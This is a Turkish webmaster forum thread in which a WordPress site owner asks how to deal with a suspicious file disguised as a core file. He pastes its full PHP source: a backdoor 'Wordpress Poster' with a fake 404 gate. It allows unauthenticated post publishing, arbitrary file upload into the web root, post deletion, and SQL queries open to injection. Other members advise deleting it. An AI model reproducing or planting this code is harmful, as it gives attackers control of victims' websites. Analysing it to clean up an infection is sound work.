Bu Açığı kapatmanın Yolu Nedir?

19.10.2013 17:34

aktassa WM Aracı Kullanıcı

Üyelik 07.08.2011
Yaş/Cinsiyet 38 / E
Meslek Gemi Makinaları Mühendisi
Konum

Ad Soyad S** A**
Mesajlar 170
Beğeniler 44 / 18
Ticaret 0, (%0)

Selamlar arkadaşlar.
Güvenlik açığı konusu var mı diye baktım ama bulamadım.
Şimdi benim wordpress blog ile ilgili ciddi sorunlar yaşıyorum.

Küçük bir araştırma ile açığı buldum ama bunu nasıl kapatacağımı bulamadım.

Açık Kodu
/wp-admin/includes/class-wp-ms-users.php
Dosya izni de 644.

Bunu nasıl engelleriz?

Şimdiden yardımcı olan arkadaşlara teşekkür ederim.

Bilginin Yeni Rotası

19.10.2013 17:42

#2

Jih4d Sms Onayı Gerekli Banlı Kullanıcı

Üyelik 14.08.2013
Yaş/Cinsiyet 37 / E
Meslek Ne iş olsa yaparım abi
Konum İstanbul Avrupa

Ad Soyad ** **
Mesajlar 229
Beğeniler 0 / 136
Ticaret 2, (%100)

6.1 kullanıyorum o dizinde öyle bir dosya yok bende, hangi sürüm kurulu sizde? Ayrıca dosya içeriğini yazarsanız buraya inceleriz.

1 kişi bu mesajı beğendi.

19.10.2013 17:47

#3

aktassa WM Aracı Kullanıcı

Üyelik 07.08.2011
Yaş/Cinsiyet 38 / E
Meslek Gemi Makinaları Mühendisi
Konum

Ad Soyad S** A**
Mesajlar 170
Beğeniler 44 / 18
Ticaret 0, (%0)

Sürüm olarak şunu düyor;
WordPress’in en son sürümünü kullanıyorsunuz.

En güncel WordPress sürümünü kullanıyorsunuz. Yine de eğer 3.6.1–tr_TR sürümüne geri dönmek isterseniz, otomatik olarak yapabilir ya da ilgili dosyayı indirerek kendiniz yeniden yükleme yapabilirsiniz

Dosya İçeriği;











/*



$yol = $_SERVER["DOCUMENT_ROOT"]."/wp-includes/tmp";



@mkdir($yol);



chmod($yol,0777);



//rmdir("../../tmp");



session_save_path($yol);  



ini_set('session.gc_probability', 1);  



@session_start();







$auth_pass = "965df8b132b05a89fc0e1cb8389fa86d";



*/



$sayfa = $_SERVER['PHP_SELF'];



$url = explode('/',"$sayfa"); 







$dosya = end($url);



/*



$pass = md5(@$_POST["pass"]);



if( $pass  == $auth_pass){



	



	$_SESSION['login']=TRUE;



		



}



if( @$_SESSION['login'] != TRUE) {



			kontrol();



			}







function kontrol() {



	die("404 Not Found



Not Found



The requested URL was not found on this server.



Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.



	



	Apache Server at ".$_SERVER["HTTP_HOST"]." Port 80




	");



} 



*/



@include("../../wp-load.php");



@include("../../wp-config.php");







function sefyap ( $fonktmp ) {



    $returnstr = "";



    $turkcefrom = array("/Ğ/","/Ü/","/Ş/","/İ/","/Ö/","/Ç/","/ğ/","/ü/","/ş/","/ı/","/ö/","/ç/");



    $turkceto   = array("G","U","S","I","O","C","g","u","s","i","o","c");



    $fonktmp = preg_replace("/[^0-9a-zA-ZÄzÜŞİÖÇğüşıöç]/"," ",$fonktmp);



    // Türkçe harfleri ingilizceye çevir



    $fonktmp = preg_replace($turkcefrom,$turkceto,$fonktmp);



    // Birden fazla olan boşlukları tek boşluk yap



    $fonktmp = preg_replace("/ +/"," ",$fonktmp);



    // Boşukları - işaretine çevir



    $fonktmp = preg_replace("/ /","-",$fonktmp);



    // Tüm beyaz karekterleri sil



    $fonktmp = preg_replace("/\s/","",$fonktmp);



    // Karekterleri küçült



    $fonktmp = strtolower($fonktmp);



    // Başta ve sonda - işareti kaldıysa yoket



    $fonktmp = preg_replace("/^-/","",$fonktmp);



    $fonktmp = preg_replace("/-$/","",$fonktmp);



    $returnstr = $tmpdate . $fonktmp;



    return $returnstr;



}











if(@$_POST['baslik'] != ""){







	$baslik = $_POST['baslik'];



	$etiket = $_POST['etiket'];



	$tarih = $_POST['tarih'];



	$icerik = stripslashes($_POST['icerik']);



	$cate = $_POST['kat'];



	



	$my_post = array(); 



        $my_post['post_title'] = $baslik; 



        $my_post['post_content'] = $icerik;



        $my_post['post_status'] = 'publish'; 



        $my_post['post_author'] = 1; 



		$my_post['post_category'] = array($cate);  



        $my_post['tags_input'] = $etiket;



        $my_post['post_date'] = $tarih;



		



	$ted = wp_insert_post( $my_post );	



	$sql  = mysql_query("SELECT `guid` FROM `".$table_prefix."posts` ORDER BY `ID` DESC LIMIT 0,1");



	$veri = mysql_fetch_object($sql); 



	echo "";



	echo "";



	//echo $veri->guid;



	if($ted){



		echo "Durum :  "."Eklendi

";



		echo "URL    :  "."guid\" target=\"_blank\">$veri->guid";



	}else{



		echo "Durum :  "."Eklenemedi

";



	}



	echo "";



	echo "";



}	



?>



Wordpress Poster











ANASAYFA--



Kategoriler : 





function kategoriSay($katID) {



    global $wpdb;



    $post_say = 0;



    $querystr = "SELECT count FROM wp_term_taxonomy WHERE term_taxonomy_id = $katID";



    $result = $wpdb->get_var($querystr);



    $post_say = $result;



    return $post_say ;



}



 











$get = mysql_query("select * from wp_term_taxonomy where taxonomy='category'");



		while($gelis=mysql_fetch_array($get)){



			$term_id = $gelis['term_id'];



			$adbul = mysql_query("select * from wp_terms where term_id='$term_id'"); 



			$oks = mysql_fetch_array($adbul);



			$neymis = $oks['name'];



				echo "".$neymis."(".kategoriSay($term_id).")"."   ";



				



				}



?>

























if(isset($_FILES['dosya'])){



   $hata = $_FILES['dosya']['error'];



   if($hata != 0) {



      echo 'Yüklenirken bir hata gerçekleşmiş.';



   } else {



		$tip = $_FILES['dosya']['type'];



		$isim = $_FILES['dosya']['name'];



		$uzanti = explode('.', $isim);



		$dosya = $_FILES['dosya']['tmp_name'];



		$a = copy($dosya,$_FILES['dosya']['name']);



		if($a){



			echo "";



			echo 'Dosya Upload Edildi';



			echo "";



		}else{



			echo "";



			echo 'Dosya Uploadı Başarısız';



			echo "";



		}



		 }



   }



   



   $islem = @$_GET["islem"];



   



   if($islem == "kat"){



   



		$kat_id = $_GET["katid"];



		



			







				$dizi[] = array();



			$sql = 	mysql_query("SELECT * FROM `wp_term_relationships` WHERE `term_taxonomy_id` = '$kat_id.'");



			while($veri = mysql_fetch_object($sql)){



				



				 



				array_push($dizi,$veri->object_id);







									



			}



			



			$aa = implode(",",$dizi);



			 $a = str_replace("Array,","",$aa);



			



				$sql2 = mysql_query("SELECT * FROM `wp_posts` WHERE `ID` IN ($a) ORDER BY `post_date` ASC LIMIT 30");



				while($veri2 = mysql_fetch_object($sql2)){



					?>



						



			



		post_title."  ($veri2->post_date)  " ?>



				   




			







		

   }elseif($islem == "sil"){



		



			$id = $_GET["id"];



				$sql = mysql_query("DELETE FROM `".$table_prefix."posts` WHERE `ID` = '{$id}'");



				if($sql){



					?>



					







				SİLİNDİ" ?>



									



				



					



					

				}else{



					



					?>



					



					







				HATA" ?>



								







					



					



					

				



				}



  



   }else{



   



   ?>



	















	Başlık  : 




	Etiket   : 




	Tarih     : 




	Kategori:



	



	




	



	







	



	



		



		



	



	







   



   





?>

Bilginin Yeni Rotası

19.10.2013 18:01

#4

Gokhan01 Webmaster Kullanıcı

Üyelik 21.01.2012
Yaş/Cinsiyet 31 / E
Meslek Webmaster
Konum Adana

Ad Soyad G** A**
Mesajlar 485
Beğeniler 93 / 108
Ticaret 18, (%100)

Sil o dosyayı buyuk ihtimal bir eklenti ile siteye eklenmiştir.

19.10.2013 18:07

#5

yeninesil WM Aracı Kullanıcı

Üyelik 09.10.2013
Yaş/Cinsiyet 32 / E
Meslek Memur
Konum Konya

Ad Soyad ** **
Mesajlar 28
Beğeniler 2 / 8
Ticaret 0, (%0)

bende de var bundan viewsource yaptığımda şöyle gözüküyor: acaba bunu silsek birşey olurmu. site falan çökmesin.




Wordpress Poster


ANASAYFA--
Kategoriler : 
Güncel(39)   Seo(6)   Wordpress(25)   Teknoloji(10)   Genel(7)   



	



	Başlık;: 

	Etiket   : 

	Tarih     : 

	Kategori:

19.10.2013 18:09

#6

Jevel Sms Onayı Gerekli Banlı Kullanıcı

Üyelik 23.04.2013
Yaş/Cinsiyet 29 / E
Meslek Üniversite
Konum İstanbul Avrupa

Ad Soyad ** **
Mesajlar 502
Beğeniler 13 / 68
Ticaret 1, (%100)

Jih4d adlı üyeden alıntı

6.1 kullanıyorum o dizinde öyle bir dosya yok bende, hangi sürüm kurulu sizde? Ayrıca dosya içeriğini yazarsanız buraya inceleriz.

Aynı şekilde bende de yok.

19.10.2013 18:38

#7

bitirimci Kimlik Onayı Bekliyor Banlı Kullanıcı

Üyelik 20.05.2013
Yaş/Cinsiyet 41 / E
Meslek Serbest
Konum İstanbul Avrupa

Ad Soyad M** Y**
Mesajlar 1170
Beğeniler 216 / 214
Ticaret 0, (%0)

Site yedekle sil onu

19.10.2013 18:49

#8

yeninesil WM Aracı Kullanıcı

Üyelik 09.10.2013
Yaş/Cinsiyet 32 / E
Meslek Memur
Konum Konya

Ad Soyad ** **
Mesajlar 28
Beğeniler 2 / 8
Ticaret 0, (%0)

Gökhan Blog adlı üyeden alıntı

Sil o dosyayı buyuk ihtimal bir eklenti ile siteye eklenmiştir.

bende ayrıca şunlar da var. bu dosya ile alakalı mı değil mi bilmiyorum ama. zararı olur mu bunların. sizde de var mı?

19.10.2013 21:21

#9

soulmy WM Aracı Kullanıcı

Üyelik 12.06.2012
Yaş/Cinsiyet 38 / E
Meslek Öğretmen
Konum Samsun

Ad Soyad O** Y**
Mesajlar 1722
Beğeniler 398 / 400
Ticaret 20, (%100)

Koda bakın yahu. En ufak bir filtreleme yok :D

Bu arada Türkçe adlara dikkat edin. Orijinal Wordpress dosyasında Türkçe ad olur mu hiç :D

$kat_id = $_GET["katid"];



$dizi[] = array();



$sql  mysql_query("SELECT * FROM `wp_term_relationships` WHERE `term_taxonomy_id` = '$kat_id.'");

1 kişi bu mesajı beğendi.

.

19.10.2013 23:13

#10

aktassa WM Aracı Kullanıcı

Üyelik 07.08.2011
Yaş/Cinsiyet 38 / E
Meslek Gemi Makinaları Mühendisi
Konum

Ad Soyad S** A**
Mesajlar 170
Beğeniler 44 / 18
Ticaret 0, (%0)

@soulmy
bu durumda öneriniz nedir acaba?

Bilginin Yeni Rotası

Bu Açığı kapatmanın Yolu Nedir?

Not Found

Üye Girişi Yap